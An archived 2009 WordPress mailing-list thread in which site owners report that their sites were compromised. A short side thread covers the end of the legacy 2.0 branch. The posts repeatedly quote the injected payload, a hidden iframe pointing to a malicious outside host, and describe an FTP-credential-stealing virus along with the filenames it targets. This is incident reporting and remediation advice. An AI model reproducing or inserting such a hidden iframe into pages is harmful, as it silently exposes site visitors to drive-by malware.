Re: [wp-testers] Whats up with the legacy 2.0 branch?
Correct me if I'm wrong, but wasn't 2.0 legacy support committed to in order to get WP into Debian? If so, has that status changed? -Doug http://literalbarrage.org/blog/ ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
[wp-testers] Default.widgets.php Hacked? What to do?
I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Sorry to mention..blog was on 2.8.1...didn't got time to upgrade...now upgrading. On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pattpblogedi...@gmail.com wrote: yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Oh Whew! My heart was racing there for a second... :D On Thu, Jul 23, 2009 at 4:50 PM, Navjot Singh navjotjsi...@gmail.comwrote: Sorry to mention..blog was on 2.8.1...didn't got time to upgrade...now upgrading. On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pattpblogedi...@gmail.com wrote: yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Saw this on WP.org http://wordpress.org/support/topic/281767 Looks like a grumbman virus .. scan every PC you're using to FTP ... This happened to a WP site of mine that I accessed FTP on my sister's PC Fucking virusues ... It apparently searches for FTP cridentals, then transmits them.. change your FTP PWD. On Thu, Jul 23, 2009 at 3:52 PM, Paleo Pat tpblogedi...@gmail.com wrote: Oh Whew! My heart was racing there for a second... :D On Thu, Jul 23, 2009 at 4:50 PM, Navjot Singh navjotjsi...@gmail.com wrote: Sorry to mention..blog was on 2.8.1...didn't got time to upgrade...now upgrading. On Fri, Jul 24, 2009 at 2:17 AM, Paleo Pattpblogedi...@gmail.com wrote: yikes! Not good. Hope there's a patch soon. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.comwrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.comwrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Whats up with the legacy 2.0 branch?
Yep. Except that debian now contains WordPress 2.5. In the dev chat this week on IRC, it was discussed, And 2.0 is dead.. tracs been closed for it.. Its just too old a codebase for the current security patches to be applied to it. All bar an official announcement (which is coming soon on the developer blog) its been left dead in the water On Fri, 24 Jul 2009 03:34:48 +1000, zamo...@gmail.com wrote: Correct me if I'm wrong, but wasn't 2.0 legacy support committed to in order to get WP into Debian? If so, has that status changed? -Doug http://literalbarrage.org/blog/ ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh navjotjsi...@gmail.comwrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh navjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Carter carter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To: wp-testers@lists.automattic.com Cc: wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singh navjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows parition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked. On 07/23/2009 05:50 PM, Chris Carter wrote: Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singhnavjotjsi...@gmail.comwrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singhnavjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Cartercarter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To:wp-testers@lists.automattic.com Cc:wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singhnavjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
you might be in trouble... On Thu, Jul 23, 2009 at 5:08 PM, Kirk M kmb4...@gmail.com wrote: Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows parition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked. On 07/23/2009 05:50 PM, Chris Carter wrote: Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singhnavjotjsi...@gmail.com wrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singhnavjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Cartercarter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To:wp-testers@lists.automattic.com Cc:wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singhnavjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. Regards Navjot Singh ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers -- With Love Dinu http://chromestory.com http://offlineblog.net ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
Thankfully I've only gone in using FTP on 2 of them within the last 2 months so I (and they) should be okay. Still, I'll have to check the files on each of those 2 if not re-upgrade 2.8.2 altogether just to be safe. Such is life in the online world. On 07/23/2009 06:22 PM, Chris Carter wrote: you might be in trouble... On Thu, Jul 23, 2009 at 5:08 PM, Kirk Mkmb4...@gmail.com wrote: Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my sites for awhile rather than Windows at least until I get everything changed around and my Windows parition fully scanned. I have several FTP accounts configured, many are for other site owners who ask me to maintain their WP powered sites. It definitely wouldn't do to have those get hacked. On 07/23/2009 05:50 PM, Chris Carter wrote: Change your pwds and scan away.. I used cpanel file manager for a while to make sure they stopped attacking .. looking at logs, it hits and is tagged with googlebot, but the IP's are strange Anyway, This virus looks for files with: index*.* default*.* main*.* home*.* (I built a static php includes site, and only files named like the above were affected) Also might want to check your CGI-BIN for files that look suspicious It's basically is a bot that logs in, finds any files in all directories that start with the above ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the? tags :) -Chris 314media.com On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singhnavjotjsi...@gmail.com wrote: Yeah..my Wordpress mu install also got hacked. Just confirmed. On Fri, Jul 24, 2009 at 2:48 AM, dinuhe...@offlineblog.net wrote: I had to restore from backup. the entire blog when I first saw Default.widgets.php hacked, I tried restoring only that page. But then I found hidden iframe codes on all of my pages ( including pages after login ) when I contacted Dreamhost support, they said it was an ftp hack. So, I would think its not a wordpress issue. On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singhnavjotjsi...@gmail.com wrote: 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 On Fri, Jul 24, 2009 at 2:31 AM, Joshua Dunbarjosh2...@findingjesustoday.com wrote: What version of wordpress are you running? -- From: Chris Cartercarter.ch...@gmail.com Sent: Thursday, July 23, 2009 3:43 PM To:wp-testers@lists.automattic.com Cc:wp-testers@lists.automattic.com; wp-hack...@lists.automattic.com Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? I keep getting hacked with that code inserted into admin/default-filters Chris Carter President 314media.com 314-714-5448 On Jul 23, 2009, at 3:31 PM, Navjot Singhnavjotjsi...@gmail.com wrote: I have a blog running on 2.8.2 and suddenly now I find all index.php and wp-includes/Default.widgets.php hacked with following code inserted randomly : iframe src=http://u1j.in:8080/ts/in.cgi?pepsi109; width=125 height=125 style=visibility: hidden/iframe How to prevent further hacking? I am currently replacing all the files affected since all of them affected at a certain date. I am on a shared hosting and only one blog got attacked. ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers
Re: [wp-testers] Default.widgets.php Hacked? What to do?
File permissions were normal as it would be on any Normal wordpress install i.e. 644. On Fri, Jul 24, 2009 at 02:01:14AM +0530, Navjot Singh wrote: How to prevent further hacking? I am currently replacing all the files And what were the file permissions? -- Hal Yeah, I found that funny too. Thank god users of my site didn't have to mark my site as infected with virus as the whole website didn't work! On Fri, Jul 24, 2009 at 3:20 AM, Chris Cartercarter.ch...@gmail.com wrote: ...funny thing was that somtimes where they inject it, PHP code throws errors. They need to revise their bot to work outside the ? tags :) -Chris 314media.com ___ wp-testers mailing list wp-testers@lists.automattic.com http://lists.automattic.com/mailman/listinfo/wp-testers